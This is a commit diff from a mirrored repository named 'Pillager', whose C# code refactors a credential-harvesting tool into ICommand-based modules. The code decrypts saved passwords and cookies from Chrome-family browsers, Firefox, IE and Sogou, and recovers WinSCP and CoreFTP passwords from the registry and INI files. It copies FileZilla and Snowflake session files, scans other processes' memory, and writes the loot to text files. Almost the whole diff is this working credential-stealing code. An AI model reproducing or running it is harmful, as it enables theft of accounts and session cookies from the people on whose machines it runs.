qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update

This commit is contained in:
簞純 2024-08-01 12:16:14 +08:00
parent 136ca40c63
commit 48499d7bff
57 changed files with 3371 additions and 549 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
Pillager/Browsers/Chrome.cs
View File

@ -2,23 +2,24 @@
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
using System.Security.Cryptography;
using System.Text;
using Pillager.Helper;
namespace Pillager.Browsers
{
public static class Chrome
public class Chrome : ICommand
{
public static string BrowserPath { get; set; }
public string BrowserPath { get; set; }
public static string BrowserName { get; set; }
public string BrowserName { get; set; }
public static byte[] MasterKey { get; set; }
public byte[] MasterKey { get; set; }
private static string[] profiles { get; set; }
private string[] profiles { get; set; }
public static Dictionary<string, string> browserOnChromium = new Dictionary<string, string>
public Dictionary<string, string> browserOnChromium = new Dictionary<string, string>
{
{ "Chrome", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Google\\Chrome\\User Data" )} ,
{ "Chrome Beta",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google\\Chrome Beta\\User Data" )},
@ -44,10 +45,10 @@ namespace Pillager.Browsers
{ "Iridium", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Iridium\\User Data" )},
{ "Opera", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"Opera Software\\Opera Stable" )},
{ "Opera GX", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"Opera Software\\Opera GX Stable" )},
{ "The World", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"theworld6\\User Data" )},
};
public static byte[] GetMasterKey()
public byte[] GetMasterKey()
{
string filePath = Path.Combine(BrowserPath, "Local State");
byte[] masterKey = new byte[] { };
@ -71,13 +72,13 @@ namespace Pillager.Browsers
}
}
private static byte[] DecryptData(byte[] buffer)
private byte[] DecryptData(byte[] buffer)
{
byte[] decryptedData = null;
if (MasterKey is null) return null;
try
{
string bufferString = Encoding.Default.GetString(buffer);
string bufferString = Encoding.UTF8.GetString(buffer);
if (bufferString.StartsWith("v10") || bufferString.StartsWith("v11"))
{
byte[] iv = new byte[12];
@ -99,7 +100,7 @@ namespace Pillager.Browsers
return decryptedData;
}
public static string Chrome_passwords()
public string Chrome_passwords()
{
StringBuilder passwords = new StringBuilder();
foreach (var profile in profiles)
@ -133,7 +134,7 @@ namespace Pillager.Browsers
return passwords.ToString();
}
public static string Chrome_history()
public string Chrome_history()
{
StringBuilder history = new StringBuilder();
foreach (var profile in profiles)
@ -160,19 +161,19 @@ namespace Pillager.Browsers
return history.ToString();
}
public static string Chrome_cookies()
public string Chrome_cookies()
{
StringBuilder cookies = new StringBuilder();
foreach (var profile in profiles)
{
string chrome_cookie_path = Path.Combine(BrowserPath, profile + "\\Cookies");
string chrome_100plus_cookie_path = Path.Combine(BrowserPath, profile + "\\Network\\Cookies");
if (!File.Exists(chrome_cookie_path))
chrome_cookie_path = chrome_100plus_cookie_path;
if (!File.Exists(chrome_cookie_path))
continue;
try
{
string chrome_cookie_path = Path.Combine(BrowserPath, profile + "\\Cookies");
string chrome_100plus_cookie_path = Path.Combine(BrowserPath, profile + "\\Network\\Cookies");
if (File.Exists(chrome_100plus_cookie_path))
chrome_cookie_path = chrome_100plus_cookie_path;
if (!File.Exists(chrome_cookie_path))
continue;
string cookie_tempFile = Path.GetTempFileName();
try
{
@ -196,6 +197,7 @@ namespace Pillager.Browsers
string host_key = handler.GetValue(i, "host_key");
string name = handler.GetValue(i, "name");
string crypt = handler.GetValue(i, "encrypted_value");
if (string.IsNullOrEmpty(crypt)) continue;
string path = handler.GetValue(i, "path");
double expDateDouble = 0;
long.TryParse(handler.GetValue(i, "expires_utc"), out var expDate);
@ -219,7 +221,7 @@ namespace Pillager.Browsers
}
catch { }
}
if (cookies.Length > 0)
if (cookies.Length > 3)
{
string temp = cookies.ToString();
return "[" + temp.Substring(0, temp.Length - 3) + "]";
@ -227,7 +229,7 @@ namespace Pillager.Browsers
return cookies.ToString();
}
public static string Chrome_books()
public string Chrome_books()
{
StringBuilder stringBuilder = new StringBuilder();
foreach (var profile in profiles)
@ -241,7 +243,7 @@ namespace Pillager.Browsers
return stringBuilder.ToString();
}
public static string Chrome_extensions()
public string Chrome_extensions()
{
StringBuilder stringBuilder = new StringBuilder();
foreach (var profile in profiles)
@ -273,7 +275,7 @@ namespace Pillager.Browsers
return stringBuilder.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
foreach (var browser in browserOnChromium)
{
@ -300,15 +302,15 @@ namespace Pillager.Browsers
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
if (!string.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies,Encoding.UTF8);
string passwords = Chrome_passwords();
if (!string.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords, Encoding.UTF8);
string books = Chrome_books();
if (!string.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books, Encoding.UTF8);
string history = Chrome_history();
if (!string.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history, Encoding.UTF8);
string extension = Chrome_extensions();
if (!string.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies);
if (!string.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!string.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!string.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (!string.IsNullOrEmpty(extension)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_extension.txt"), extension);
if (!string.IsNullOrEmpty(extension)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_extension.txt"), extension, Encoding.UTF8);
foreach (var profile in profiles)
{
Directory.CreateDirectory(Path.Combine(BrowserPath, profile));

34
Pillager/Browsers/FireFox.cs
View File

@ -7,16 +7,14 @@ using System.Text.RegularExpressions;
namespace Pillager.Browsers
{
internal static class FireFox
internal class FireFox: ICommand
{
public static string BrowserName = "FireFox";
public static string BrowserPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
public string BrowserPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"Mozilla\\Firefox\\Profiles");
public static string masterPassword = "";
public string masterPassword = "";
public static string FireFox_cookies()
public string FireFox_cookies()
{
StringBuilder cookies = new StringBuilder();
foreach (var directory in Directory.GetDirectories(BrowserPath))
@ -47,7 +45,7 @@ namespace Pillager.Browsers
return cookies.ToString();
}
public static string FireFox_history()
public string FireFox_history()
{
StringBuilder history = new StringBuilder();
foreach (var directory in Directory.GetDirectories(BrowserPath))
@ -75,7 +73,7 @@ namespace Pillager.Browsers
return history.ToString();
}
public static string FireFox_books()
public string FireFox_books()
{
StringBuilder books = new StringBuilder();
foreach (var directory in Directory.GetDirectories(BrowserPath))
@ -117,7 +115,7 @@ namespace Pillager.Browsers
return books.ToString();
}
public static string FireFox_passwords()
public string FireFox_passwords()
{
StringBuilder password = new StringBuilder();
foreach (var directory in Directory.GetDirectories(BrowserPath))
@ -200,7 +198,7 @@ namespace Pillager.Browsers
return password.ToString();
}
public static string decryptLogins(string loginsJsonPath, byte[] privateKey)
public string decryptLogins(string loginsJsonPath, byte[] privateKey)
{
StringBuilder sb = new StringBuilder();
Asn1Der asn = new Asn1Der();
@ -219,7 +217,7 @@ namespace Pillager.Browsers
return sb.ToString();
}
public static Login[] ParseLoginFile(string path)
public Login[] ParseLoginFile(string path)
{
string rawText = File.ReadAllText(path);
int openBracketIndex = rawText.IndexOf('[');
@ -228,7 +226,7 @@ namespace Pillager.Browsers
return ParseLoginItems(loginArrayText);
}
public static Login[] ParseLoginItems(string loginJSON)
public Login[] ParseLoginItems(string loginJSON)
{
int openBracketIndex = loginJSON.IndexOf('{');
List<Login> logins = new List<Login>();
@ -273,21 +271,21 @@ namespace Pillager.Browsers
}
return logins.ToArray();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
if (!Directory.Exists(BrowserPath)) return;
string savepath = Path.Combine(path, BrowserName);
string savepath = Path.Combine(path, "FireFox");
Directory.CreateDirectory(savepath);
string cookies = FireFox_cookies();
string history = FireFox_history();
string books = FireFox_books();
string passwords = FireFox_passwords();
if (!String.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, "FireFox_cookies.txt"), cookies, Encoding.UTF8);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, "FireFox_history.txt"), history, Encoding.UTF8);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, "FireFox_books.txt"), books, Encoding.UTF8);
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, "FireFox_passwords.txt"), passwords, Encoding.UTF8);
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite")))

28
Pillager/Browsers/IE.cs
View File

@ -10,22 +10,14 @@ using System.Text.RegularExpressions;
namespace Pillager.Browsers
{
public static class IE
public class IE : ICommand
{
public static string BrowserName = "IE";
[DllImport("kernel32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
[DllImport("kernel32")]
public static extern IntPtr GetCurrentProcess();
public static string IE_passwords()
public string IE_passwords()
{
if (IntPtr.Size == 4)
{
IsWow64Process(GetCurrentProcess(), out var is64Bit);
Native.IsWow64Process(Native.GetCurrentProcess(), out var is64Bit);
if (is64Bit)
{
return "Don't support recovery IE password from wow64 process";
@ -224,7 +216,7 @@ namespace Pillager.Browsers
return sb.ToString();
}
public static string IE_history()
public string IE_history()
{
StringBuilder sb = new StringBuilder();
RegistryKey myreg = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Explorer\\TypedURLs");
@ -248,7 +240,7 @@ namespace Pillager.Browsers
return sb.ToString();
}
public static string IE_books()
public string IE_books()
{
StringBuilder sb = new StringBuilder();
string book_path = Environment.GetFolderPath(Environment.SpecialFolder.Favorites);
@ -269,18 +261,18 @@ namespace Pillager.Browsers
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, BrowserName);
string savepath = Path.Combine(path, "IE");
Directory.CreateDirectory(savepath);
string passwords = IE_passwords();
string books = IE_books();
string history = IE_history();
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, "IE_passwords.txt"), passwords, Encoding.UTF8);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, "IE_books.txt"), books, Encoding.UTF8);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, "IE_history.txt"), history, Encoding.UTF8);
}
catch { }
}

26
Pillager/Browsers/OldSogou.cs
View File

@ -6,16 +6,14 @@ using System.Text;
namespace Pillager.Browsers
{
internal static class OldSogou
internal class OldSogou : ICommand
{
public static string BrowserName = "OldSogouExplorer";
public static string BrowserPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
public string BrowserPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"SogouExplorer\\Webkit\\Default");
public static byte[] MasterKey;
public byte[] MasterKey;
public static byte[] GetMasterKey()
public byte[] GetMasterKey()
{
string filePath = Path.Combine(Directory.GetParent(BrowserPath).FullName, "Local State");
byte[] masterKey = new byte[] { };
@ -39,13 +37,13 @@ namespace Pillager.Browsers
}
}
private static byte[] DecryptData(byte[] buffer)
private byte[] DecryptData(byte[] buffer)
{
byte[] decryptedData = null;
if (MasterKey is null) return null;
try
{
string bufferString = Encoding.Default.GetString(buffer);
string bufferString = Encoding.UTF8.GetString(buffer);
if (bufferString.StartsWith("v10") || bufferString.StartsWith("v11"))
{
byte[] iv = new byte[12];
@ -68,7 +66,7 @@ namespace Pillager.Browsers
return decryptedData;
}
public static string Sogou_cookies()
public string Sogou_cookies()
{
StringBuilder cookies = new StringBuilder();
string chrome_cookie_path = Path.Combine(BrowserPath, "Cookies");
@ -106,7 +104,7 @@ namespace Pillager.Browsers
return cookies.ToString();
}
public static string Sogou_history()
public string Sogou_history()
{
StringBuilder history = new StringBuilder();
string sogou_History_path = Path.Combine(Directory.GetParent(Directory.GetParent(BrowserPath).FullName).FullName, "HistoryUrl3.db");
@ -128,13 +126,13 @@ namespace Pillager.Browsers
return history.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
if (!Directory.Exists(BrowserPath)) return;
MasterKey = GetMasterKey();
string savepath = Path.Combine(path, BrowserName);
string savepath = Path.Combine(path, "OldSogouExplorer");
Directory.CreateDirectory(savepath);
string cookies = Sogou_cookies();
string history = Sogou_history();
@ -142,8 +140,8 @@ namespace Pillager.Browsers
string favorite3 = Path.Combine(Directory.GetParent(Directory.GetParent(BrowserPath).FullName).FullName, "favorite3.dat");
if (File.Exists(FormData3)) File.Copy(FormData3, Path.Combine(savepath, "FormData3.dat"));
if (File.Exists(favorite3)) File.Copy(favorite3, Path.Combine(savepath, "favorite3.dat"));
if (!string.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies);
if (!string.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (!string.IsNullOrEmpty(cookies)) File.WriteAllText(Path.Combine(savepath, "OldSogouExplorer_cookies.txt"), cookies, Encoding.UTF8);
if (!string.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, "OldSogouExplorer_history.txt"), history, Encoding.UTF8);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Storage"), Path.Combine(savepath, "Local Storage"), true);
}
catch { }

23
Pillager/FTPs/CoreFTP.cs
View File

@ -1,21 +1,16 @@
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Runtime.Remoting.Channels;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
namespace Pillager.FTPs
{
internal class CoreFTP
internal class CoreFTP : ICommand
{
public static string FTPName = "CoreFTP";
public static string GetInfo()
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
string rkPath = "Software\\FTPWare\\CoreFTP\\Sites";
@ -45,7 +40,7 @@ namespace Pillager.FTPs
return sb.ToString();
}
private static string Decrypt(string encryptedData, string key)
private string Decrypt(string encryptedData, string key)
{
byte[] array = Encoding.UTF8.GetBytes(key);
PadToMultipleOf(ref array, 8);
@ -66,13 +61,13 @@ namespace Pillager.FTPs
return text;
}
private static void PadToMultipleOf(ref byte[] src, int pad)
private void PadToMultipleOf(ref byte[] src, int pad)
{
int num = (src.Length + pad - 1) / pad * pad;
Array.Resize(ref src, num);
}
private static byte[] ConvertHexStringToByteArray(string hexString)
private byte[] ConvertHexStringToByteArray(string hexString)
{
if (hexString.Length % 2 != 0)
{
@ -87,16 +82,16 @@ namespace Pillager.FTPs
return array;
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, FTPName);
string savepath = Path.Combine(path, "CoreFTP");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, FTPName + ".txt"), output);
File.WriteAllText(Path.Combine(savepath, "CoreFTP.txt"), output, Encoding.UTF8);
}
}
catch { }

13
Pillager/FTPs/FileZilla.cs
View File

@ -1,22 +1,21 @@
using System;
using Pillager.Helper;
using System;
using System.IO;
namespace Pillager.FTPs
{
internal class FileZilla
internal class FileZilla : ICommand
{
public static string FTPName = "FileZilla";
public static void Save(string path)
public override void Save(string path)
{
try
{
string xmlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"FileZilla\recentservers.xml");
if (File.Exists(xmlpath))
{
string savepath = Path.Combine(path, FTPName);
string savepath = Path.Combine(path, "FileZilla");
Directory.CreateDirectory(savepath);
File.Copy(xmlpath, Path.Combine(savepath, FTPName + ".txt"));
File.Copy(xmlpath, Path.Combine(savepath, "FileZilla.txt"));
}
}
catch { }

15
Pillager/FTPs/Snowflake.cs
View File

@ -1,24 +1,19 @@
using System;
using System.Collections.Generic;
using Pillager.Helper;
using System;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Pillager.FTPs
{
internal class Snowflake
internal class Snowflake : ICommand
{
public static string FTPName = "Snowflake";
public static void Save(string path)
public override void Save(string path)
{
try
{
string jsonpath = Path.Combine(Environment.GetEnvironmentVariable("USERPROFILE"), "snowflake-ssh\\session-store.json");
if (File.Exists(jsonpath))
{
string savepath = Path.Combine(path, FTPName);
string savepath = Path.Combine(path, "Snowflake");
Directory.CreateDirectory(savepath);
File.Copy(jsonpath, Path.Combine(savepath, "session-store.json"));
}

126
Pillager/FTPs/WinSCP.cs
View File

@ -1,13 +1,14 @@
using System.IO;
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using Microsoft.Win32;
using Pillager.Helper;
namespace Pillager.FTPs
{
internal class WinSCP
internal class WinSCP : ICommand
{
public static string FTPName = "WinSCP";
static readonly int PW_MAGIC = 0xA3;
static readonly char PW_FLAG = (char)0xFF;
@ -17,7 +18,7 @@ namespace Pillager.FTPs
public string remainingPass;
}
private static Flags DecryptNextCharacterWinSCP(string passwd)
private Flags DecryptNextCharacterWinSCP(string passwd)
{
Flags Flag;
string bases = "0123456789ABCDEF";
@ -30,7 +31,7 @@ namespace Pillager.FTPs
return Flag;
}
private static string DecryptWinSCPPassword(string Host, string userName, string passWord)
private string DecryptWinSCPPassword(string Host, string userName, string passWord)
{
var clearpwd = string.Empty;
char length;
@ -65,51 +66,126 @@ namespace Pillager.FTPs
return clearpwd;
}
public static string GetInfo()
static string ProgramFilesx86()
{
if (8 == IntPtr.Size
|| (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
{
return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
}
return Environment.GetEnvironmentVariable("ProgramFiles");
}
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
string registry = @"Software\Martin Prikryl\WinSCP 2\Sessions";
var registryKey = Registry.CurrentUser.OpenSubKey(registry);
if (registryKey == null) return "";
foreach (string rname in registryKey.GetSubKeyNames())
if (registryKey != null)
{
using (var session = registryKey.OpenSubKey(rname))
foreach (string rname in registryKey.GetSubKeyNames())
{
if (session != null)
using (var session = registryKey.OpenSubKey(rname))
{
string hostname = (session.GetValue("HostName") != null) ? session.GetValue("HostName").ToString() : "";
if (!string.IsNullOrEmpty(hostname))
if (session != null)
{
try
string hostname = (session.GetValue("HostName") != null) ? session.GetValue("HostName").ToString() : "";
if (!string.IsNullOrEmpty(hostname))
{
string username = session.GetValue("UserName").ToString();
string password = session.GetValue("Password").ToString();
sb.AppendLine("hostname: "+ hostname);
sb.AppendLine("username: " + username);
sb.AppendLine("rawpass: " + password);
sb.AppendLine("password: " + DecryptWinSCPPassword(hostname, username, password));
try
{
string username = session.GetValue("UserName").ToString();
string password = session.GetValue("Password").ToString();
sb.AppendLine("hostname: " + hostname);
sb.AppendLine("username: " + username);
sb.AppendLine("rawpass: " + password);
sb.AppendLine("password: " + DecryptWinSCPPassword(hostname, username, password));
sb.AppendLine();
}
catch
{ }
}
catch
{ }
}
}
}
}
string inipath1 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "WinSCP.ini");
if (File.Exists(inipath1))
{
Pixini pixini = Pixini.Load(inipath1);
Dictionary<string, List<IniLine>> sectionMap = pixini.sectionMap;
foreach (var item in sectionMap)
{
if (item.Key.ToLower().StartsWith("sessions"))
{
string host = "";
string user = "";
string password = "";
List<IniLine> iniLines = item.Value;
foreach (var line in iniLines)
{
if (line.key == null) continue;
if (line.key.ToLower() == "hostname") host = line.value;
if (line.key.ToLower() == "username") user = line.value;
if (line.key.ToLower() == "password") password = line.value;
}
if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(user))
password = DecryptWinSCPPassword(host, user, password);
sb.AppendLine("hostname: " + host);
sb.AppendLine("username: " + user);
sb.AppendLine("password: " + password);
sb.AppendLine();
}
}
}
string inipath2 = Path.Combine(ProgramFilesx86(), "WinSCP.ini");
if (File.Exists(inipath2))
{
Pixini pixini = Pixini.Load(inipath2);
Dictionary<string, List<IniLine>> sectionMap = pixini.sectionMap;
foreach (var item in sectionMap)
{
if (item.Key.ToLower().StartsWith("sessions"))
{
string host = "";
string user = "";
string password = "";
List<IniLine> iniLines = item.Value;
foreach (var line in iniLines)
{
if (line.key == null) continue;
if (line.key.ToLower() == "hostname") host = line.value;
if (line.key.ToLower() == "username") user = line.value;
if (line.key.ToLower() == "password") password = line.value;
}
if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(user))
password = DecryptWinSCPPassword(host, user, password);
sb.AppendLine("hostname: " + host);
sb.AppendLine("username: " + user);
sb.AppendLine("password: " + password);
sb.AppendLine();
}
}
}
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, FTPName);
string savepath = Path.Combine(path, "WinSCP");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, FTPName + ".txt"), output);
File.WriteAllText(Path.Combine(savepath, "WinSCP.txt"), output, Encoding.UTF8);
}
}
catch { }

2
Pillager/Helper/Bcrypt.cs
View File

@ -1,6 +1,4 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

13
Pillager/Helper/ICommand.cs Normal file
View File

@ -0,0 +1,13 @@
using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Linq;
using System.Text;
namespace Pillager.Helper
{
public abstract class ICommand
{
public abstract void Save(string path);
}
}

13
Pillager/Helper/ICommandOnce.cs Normal file
View File

@ -0,0 +1,13 @@
using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Linq;
using System.Text;
namespace Pillager.Helper
{
public abstract class ICommandOnce
{
public abstract void Save(string path);
}
}

50
Pillager/Helper/JavaRng.cs Normal file
View File

@ -0,0 +1,50 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Pillager.Helper
{
public sealed class JavaRng
{
public JavaRng(long seed)
{
_seed = (seed ^ LARGE_PRIME) & ((1L << 48) - 1);
}
public long nextLong()
{
return ((long)next(32) << 32) + next(32);
}
public int nextInt(int bound)
{
if (bound <= 0)
throw new ArgumentOutOfRangeException(nameof(bound), bound, "bound must be positive");
int r = next(31);
int m = bound - 1;
if ((bound & m) == 0) // i.e., bound is a power of 2
r = (int)((bound * (long)r) >> 31);
else
{
for (int u = r;
u - (r = u % bound) + m < 0;
u = next(31))
;
}
return r;
}
private int next(int bits)
{
_seed = (_seed * LARGE_PRIME + SMALL_PRIME) & ((1L << 48) - 1);
return (int)((_seed) >> (48 - bits));
}
private long _seed;
private const long LARGE_PRIME = 0x5DEECE66DL;
private const long SMALL_PRIME = 0xBL;
}
}

39
Pillager/Helper/LockedFile.cs
View File

@ -136,6 +136,43 @@ namespace Pillager.Helper
return IntPtr.Zero;
}
public static string FindHandleWithFileName(Native.SYSTEM_HANDLE_INFORMATION systemHandleInformation, string filename, IntPtr processHandle)
{
IntPtr openProcessHandle = processHandle;
try
{
if (!Native.DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), Native.GetCurrentProcess(), out var ipHandle, 0, false, Native.DUPLICATE_SAME_ACCESS))
{
return "";
}
int objectTypeInfoSize = 0x1000;
IntPtr objectTypeInfo = Marshal.AllocHGlobal(objectTypeInfoSize);
try
{
int returnLength = 0;
if (Native.NtQueryObject(ipHandle, (int)Native.OBJECT_INFORMATION_CLASS.ObjectTypeInformation, objectTypeInfo, objectTypeInfoSize, ref returnLength) != 0)
{
return "";
}
var objectTypeInfoStruct = (Native.OBJECT_TYPE_INFORMATION)Marshal.PtrToStructure(objectTypeInfo, typeof(Native.OBJECT_TYPE_INFORMATION));
string typeName = objectTypeInfoStruct.Name.ToString();
if (typeName == "File")
{
string name = TryGetName(ipHandle);
if (name.Contains(filename))
return name;
}
}
finally
{
Marshal.FreeHGlobal(objectTypeInfo);
}
}
catch { }
return "";
}
private static IntPtr DuplicateHandleByFileName(int pid, string fileName)
{
IntPtr handle = IntPtr.Zero;
@ -218,7 +255,7 @@ namespace Pillager.Helper
IntPtr.Zero);
}
private static IntPtr GetProcessHandle(int pid)
public static IntPtr GetProcessHandle(int pid)
{
return Native.OpenProcess(Native.PROCESS_ACCESS_FLAGS.PROCESS_DUP_HANDLE | Native.PROCESS_ACCESS_FLAGS.PROCESS_VM_READ, false, pid);
}

135
Pillager/Helper/Methods.cs
View File

@ -1,17 +1,123 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;
namespace Pillager.Helper
{
internal class Methods
{
internal static uint MEM_COMMIT = 0x1000;
internal static uint PAGE_READONLY = 0x02;
internal static uint PAGE_READWRITE = 0x04;
internal static uint PAGE_EXECUTE = 0x10;
internal static uint PAGE_EXECUTE_READ = 0x20;
public static List<long> SearchProcess(Process process, string searchString)
{
List<long> addrList = new List<long>();
if (IntPtr.Size == 8)
{
IntPtr minAddress = IntPtr.Zero;
IntPtr maxAddress = new IntPtr(2147483647);
while (minAddress.ToInt64() < maxAddress.ToInt64())
{
int result;
Native.MEMORY_BASIC_INFORMATION64 memInfo;
result = Native.VirtualQueryEx64(process.Handle, minAddress, out memInfo, (uint)Marshal.SizeOf(typeof(Native.MEMORY_BASIC_INFORMATION64)));
if (memInfo.State == MEM_COMMIT && (memInfo.Protect == PAGE_EXECUTE || memInfo.Protect == PAGE_EXECUTE_READ || memInfo.Protect == PAGE_EXECUTE_READ || memInfo.Protect == PAGE_READWRITE || memInfo.Protect == PAGE_READONLY))
{
byte[] buffer = new byte[(long)memInfo.RegionSize];
bool success = Native.ReadProcessMemory(process.Handle, memInfo.BaseAddress, buffer, buffer.Length, out _);
if (success)
{
byte[] search = Encoding.ASCII.GetBytes(searchString);
for (int i = 0; i < buffer.Length - 8; i++)
{
if (buffer[i] == search[0])
{
for (int s = 1; s < search.Length; s++)
{
if (buffer[i + s] != search[s])
break;
if (s == search.Length - 1)
{
addrList.Add((long)memInfo.BaseAddress + i);
}
}
}
}
}
}
minAddress = new IntPtr(memInfo.BaseAddress.ToInt64() + (long)memInfo.RegionSize);
if (result == 0)
{
break;
}
}
}
else
{
long minAddress = 0;
long maxAddress = 2147483647;
while (minAddress < maxAddress)
{
Native.MEMORY_BASIC_INFORMATION32 memInfo;
int result = Native.VirtualQueryEx32(process.Handle, (IntPtr)minAddress, out memInfo, (uint)Marshal.SizeOf(typeof(Native.MEMORY_BASIC_INFORMATION32)));
if (result == 0)
{
break;
}
if (memInfo.State == MEM_COMMIT && (memInfo.Protect == PAGE_EXECUTE || memInfo.Protect == PAGE_EXECUTE_READ || memInfo.Protect == PAGE_EXECUTE_READ || memInfo.Protect == PAGE_READWRITE || memInfo.Protect == PAGE_READONLY))
{
byte[] buffer = new byte[memInfo.RegionSize];
bool success = Native.ReadProcessMemory(process.Handle, (IntPtr)memInfo.BaseAddress, buffer, buffer.Length, out _);
if (success)
{
byte[] search = Encoding.ASCII.GetBytes(searchString);
for (int i = 0; i < buffer.Length - 8; i++)
{
if (buffer[i] == search[0])
{
for (int s = 1; s < search.Length; s++)
{
if (buffer[i + s] != search[s])
break;
if (s == search.Length - 1)
{
addrList.Add(memInfo.BaseAddress + i);
}
}
}
}
}
}
minAddress = (uint)(memInfo.BaseAddress + memInfo.RegionSize);
}
}
return addrList;
}
public static void CopyDirectory(string sourceDir, string destinationDir, bool recursive)
{
var dir = new DirectoryInfo(sourceDir);
if (!dir.Exists)
throw new DirectoryNotFoundException($"Source directory not found: {dir.FullName}");
return;
DirectoryInfo[] dirs = dir.GetDirectories();
Directory.CreateDirectory(destinationDir);
@ -20,7 +126,7 @@ namespace Pillager.Helper
string targetFilePath = Path.Combine(destinationDir, file.Name);
try
{
File.WriteAllBytes(targetFilePath, File.ReadAllBytes(file.FullName));
File.Copy(file.FullName, targetFilePath, true );
}
catch
{
